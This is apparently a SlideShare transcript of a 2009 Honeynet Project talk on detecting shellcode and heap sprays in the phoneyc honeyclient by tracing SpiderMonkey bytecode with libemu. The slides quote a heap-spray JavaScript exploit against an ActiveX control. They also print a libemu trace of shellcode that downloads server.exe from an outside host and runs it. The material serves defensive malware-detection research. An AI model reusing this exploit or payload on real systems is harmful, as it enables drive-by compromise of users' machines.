SlideShare a Scribd company logo

Shellcode and heapspray detection in phoneyc

Z Chen
Z Chen
TechnologyArt & Photos
1 of 31
Download to read offline
phoneyc with libemu Z. Chen phoneyc WB Malware . . Libemu Shellcode and heapspray detection in phoneyc Tracing JS . .. . . Basic Principles SCDetection Basic Idea Details Zhijie Chen1 Source Files Implementation 1 Honeynet Project Chinese Chapter HS Detection Current Results Honeynet Project on Google Summer of Code, 2009 JoYAN . . . . . .
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 2
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 3
Introduction to phoneyc phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS http://code.google.com/p/phoneyc/ Basic Principles SCDetection A python honeyclient Basic Idea Details Original written by Jose Nazario. Source Files Implementation To detect Web-based Malware HS Detection Current Results JoYAN 4
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 5
A Typical Heapspray Mal-javascript I phoneyc with libemu 1 <body> Z. Chen <script>window.onerror=function(){return true;}</script> phoneyc <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style=’display:none’ id=’target’></object> WB Malware <SCRIPT language="javascript"> Libemu 6 var shellcode = unescape("%u9090"+"%u9090"+ Tracing JS ...(shellcode) Basic Principles "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672 SCDetection Basic Idea %u7265%u652e%u6578%u0000"); Details </script> Source Files Implementation <SCRIPT language="javascript"> HS Detection 11 var bigblock = unescape("%u9090%u9090"); Current var headersize = 20; Results var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); 16 block = bigblock.substring(0, bigblock.length−slackspace); while(block.length+slackspace<0x40000) JoYAN block = block+block+fillblock; 6
A Typical Heapspray Mal-javascript II phoneyc with libemu memory = new Array(); Z. Chen for (x=0; x<100; x++) memory[x] = block +shellcode; 21 var buffer = ’’; phoneyc while (buffer.length < 1024) buffer+="x05"; WB Malware var ok="1111"; Libemu target.Register(ok,buffer); Tracing JS </script> Basic Principles 26 </body> SCDetection Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 7
Heap Status After Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles | More than ??MB 0x90(NOP)s or some other x86 instructions SCDetection Basic Idea as a sledge | Shellcode | Details Source Files Implementation HS Detection Current Results JoYAN 8
Detecting Shellcode/Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Tool: How To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 9
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 10
Introduction to libemu phoneyc with libemu Z. Chen . phoneyc From it’s official site: . WB Malware .. libemu is a small library written in c offering basic x86 Libemu emulation and shellcode detection using GetPC heuristics. Tracing JS Basic Principles Using libemu one can: SCDetection Basic Idea detect shellcodes Details Source Files execute the shellcodes Implementation HS Detection . profile shellcode behaviour .. . . Current Results Using libemu to detect shellcode and heapspray in web-based malware: ¡¡Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks¿¿) JoYAN 11
Detecting x86 Instructions phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Time: When To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 12
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 13
Introduction to spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS What is SpiderMonkey? . Basic Principles .. SCDetection SpiderMonkey is the code-name for the Mozilla’s C Basic Idea Details implementation of Source Files Implementation JavaScript.(http://www.mozilla.org/js/spidermonkey/) . .. . . HS Detection Current Results JoYAN 14
Basic Principles of Spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu All the javascript sources are compiled into js bytecodes. Tracing JS Basic Principles There is an interpreter who interprets the bytecodes and SCDetection Basic Idea do certain simple actions. Details Source Files All the javascript variables are stored as jsval. Implementation HS Detection Some of the values are store as an “atom”, such as strings. Current Results JoYAN 15
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 16
Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS As both the shellcode manipulation and the spraying of the Basic Principles fillblock involve assignments. The shellcode will be detected SCDetection Basic Idea immediately on it’s assignment if we are able to interrupt Details Source Files spidermonkey at the interpretion of certain bytecodes related to Implementation an assignment and check its argments and values for shellcodes. HS Detection Current Results JoYAN 17
Details I phoneyc with libemu Z. Chen The following js codes: phoneyc function a(){b="c"; var a = 0;} WB Malware Libemu are compiled into bytecodes like: Tracing JS Basic Principles 00000: bindname "b" SCDetection 00003: string "c" Basic Idea 00006: setname "b" Details Source Files 4 00009: pop Implementation 00010: zero HS Detection 00011: setvar 0 Current 00014: pop Results 00015: stop So, if we examine the set* opcodes’ arguments on the top of the stack in runtime, shellcodes won’t get passed! JoYAN 18
Details phoneyc with libemu Z. Chen phoneyc To do so, we need to: WB Malware Libemu Step trace the spidermonkey runtime. Tracing JS Stop at the key bytecodes (such as setname, setvar, Basic Principles SCDetection setprop, setarg etc.) on all kinds of Basic Idea Details assignments.Unfortunately different assignments have Source Files Implementation different bytecode accordingly. HS Detection But all the opcodes related to assignments share a Current JOF SET bit in their opcode description Results structure(./src/jsopcode.h). JoYAN 19
Related Source files to be used later phoneyc with libemu Z. Chen phoneyc WB Malware Libemu jsapi.h:Basic APIs for javascript execution. Tracing JS Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey. SCDetection Basic Idea jsopcode.tbl:All the js opcodes(bytecodes). Details Source Files Implementation jsinterp.c:You can find how each bytecode is interpreted HS Detection here. Current Results JoYAN 20
Implementation phoneyc with libemu Z. Chen Register a trace handler into spidermonkey using phoneyc JS SetInterrupt. This handler will be called at each step WB Malware of the bytecode execution. Libemu In the handler: Tracing JS Use JS GetTrapOpcode to get current Basic Principles opcode(bytecode). SCDetection Basic Idea Use JS FrameIterator to get current runtime stack. Details Check the rvalue of the set* bytecodes on the top of the Source Files Implementation stack with libemu. HS Detection Dump the shellcodes and alert. Current Contine the execution. Results Privide this traced js virtual as a python module named honeyjs, so other part of phoneyc can use this module just the same as python-spidermonkey with optional awareness of the extra shellcode/heapspray detection APIs. JoYAN 21
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 22
Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS Heapspray . Basic Principles .. A myriad of NOP-like x86 instructions SCDetection Basic Idea Details Accumulating through a loop of assignments Source Files Implementation . Shellcode in the end of each sledge .. . . HS Detection Current Results JoYAN 23
Basic Idea phoneyc with libemu Z. Chen phoneyc . Heapspray . WB Malware .. Libemu A myriad of NOP-like x86 instructions Tracing JS Accumulating through a loop of assignments Basic Principles SCDetection . Shellcode in the end of each sledge .. . . Basic Idea Details Source Files . Implementation Detection . .. HS Detection Now: A variable counter to record the mal-assignments Current Results (assignments containing shellcode in the r-value). . In the future: entropy ? the nozzle way? .. . . JoYAN 24
Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 25
A Run on ssreader 0day.html I phoneyc with libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh Z. Chen 2 HONEYCLIENT MODULE TEST fetching http://172.31.25.227/phoneyc/ssreader 0day.html phoneyc [] WB Malware ==> http://172.31.25.227/phoneyc/ssreader 0day.html Libemu JS EVAL Tracing JS 7 Executing Javascript: Basic Principles DEBUG: !!!SC DETECTED at 141847268=141847572size:374 SCDetection DEBUG: !!!SC DETECTED at 141847524=141847756size:32728 Basic Idea Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 Source Files Implementation DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 HS Detection 12 ... Current Results DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 SSReader Pdg2 Register method overflow 17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1 Runing shellcode... offset:248 JoYAN DEBUG: Begin analyzing ... DEBUG: download http://1v1.name/server.exe −> 26
A Run on ssreader 0day.html II phoneyc with libemu Z. Chen c:WINDOWSsystem32a.exe phoneyc 22 WB Malware ... Libemu Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server. Basic Principles exe’] SCDetection Done Basic Idea Details 27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1 Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT: Implementation 100 HS Detection VBS EVAL IFRAMES [] Current Results HREFS [] FRAMES [] 32 IMAGES [] JoYAN 27
Analysis of The Shellcode using libemu I phoneyc with libemu FARPROC WINAPI GetProcAddress ( Z. Chen HMODULE hModule = 0x7c800000 => 3 none; phoneyc LPCSTR lpProcName = 0x0041710c => WB Malware = "GetSystemDirectoryA"; Libemu ) = 0x7c814eea; Tracing JS FARPROC WINAPI GetProcAddress ( Basic Principles 8 HMODULE hModule = 0x7c800000 => SCDetection none; Basic Idea Details LPCSTR lpProcName = 0x00417120 => Source Files Implementation = "WinExec"; HS Detection ) = 0x7c86136d; Current 13 FARPROC WINAPI GetProcAddress ( Results HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417128 => = "ExitThread"; 18 ) = 0x7c80c058; JoYAN FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => 28
Analysis of The Shellcode using libemu II phoneyc with libemu none; Z. Chen LPCSTR lpProcName = 0x00417133 => 23 = "LoadLibraryA"; phoneyc ) = 0x7c801d77; WB Malware HMODULE LoadLibraryA ( Libemu LPCTSTR lpFileName = 0x00417140 => Tracing JS = "urlmon"; Basic Principles 28 ) = 0x7df20000; SCDetection FARPROC WINAPI GetProcAddress ( Basic Idea Details HMODULE hModule = 0x7df20000 => Source Files none; Implementation LPCSTR lpProcName = 0x00417147 => HS Detection 33 = "URLDownloadToFileA"; Current ) = 0x7df7b0bb; Results UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe5f => none; 38 UINT uSize = 32; ) = 19; JoYAN HRESULT URLDownloadToFile ( 29
Analysis of The Shellcode using libemu III phoneyc with libemu Z. Chen LPUNKNOWN pCaller = 0x00000000 => phoneyc none; WB Malware 43 LPCTSTR szURL = 0x0041715a => Libemu = "http://1v1.name/server.exe"; Tracing JS LPCTSTR szFileName = 0x0012fe5f => Basic Principles = "c:WINDOWSsystem32a.exe"; SCDetection DWORD dwReserved = 0; Basic Idea Details 48 LPBINDSTATUSCALLBACK lpfnCB = 0; Source Files ) = 0; Implementation UINT WINAPI WinExec ( HS Detection LPCSTR lpCmdLine = 0x0012fe58 => Current Results = "cmd /c c:WINDOWSsystem32a.exe"; 53 UINT uCmdShow = 0; ) = 32; JoYAN 30
phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS . Thank you! . Basic Principles SCDetection Basic Idea Details .. .. . . Source Files Implementation HS Detection Current Results JoYAN 31

Recommended

Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionGeorg Wicherski
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAbhineet Ayan
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode ExecutionRyan Wincey
 

Recommended

Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionGeorg Wicherski
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAbhineet Ayan
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode ExecutionRyan Wincey
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Software Exploits
Software ExploitsSoftware Exploits
Software ExploitsKevinCSmallwood
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit developmentDan H
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeSam Bowne
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 

More Related Content

Viewers also liked

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit developmentDan H
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeSam Bowne
 

Viewers also liked (19)

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Software Exploits
Software ExploitsSoftware Exploits
Software Exploits
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
 

Similar to Shellcode and heapspray detection in phoneyc

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 

Similar to Shellcode and heapspray detection in phoneyc (6)

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentation
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 

Recently uploaded

Are Multi-Cloud and Serverless Good or Bad?
